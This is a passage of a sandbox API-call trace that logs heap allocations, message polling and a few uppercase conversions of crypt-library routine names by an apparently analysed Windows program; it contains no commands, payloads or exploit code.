lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0185.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0185.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0185.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0185.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0185.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0185.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0185.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0185.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0185.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0185.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe880) returned 0x3bfd158 [0185.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0185.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0185.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0185.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0185.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe880) returned 0x3c0b9e0 [0185.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bfd158 | out: hHeap=0x970000) returned 1 [0185.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.413] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0185.413] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0185.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0185.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0185.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.413] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0185.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0185.413] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0185.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.414] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.414] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0185.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0185.414] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0185.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0185.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0185.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0185.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0185.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0185.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0185.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0185.415] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.415] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0185.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0185.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0185.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0185.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0185.416] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0185.416] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0185.416] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0185.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0185.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0185.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0185.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0185.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0185.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe880) returned 0x3bfd158 [0185.417] HeapFree (in: 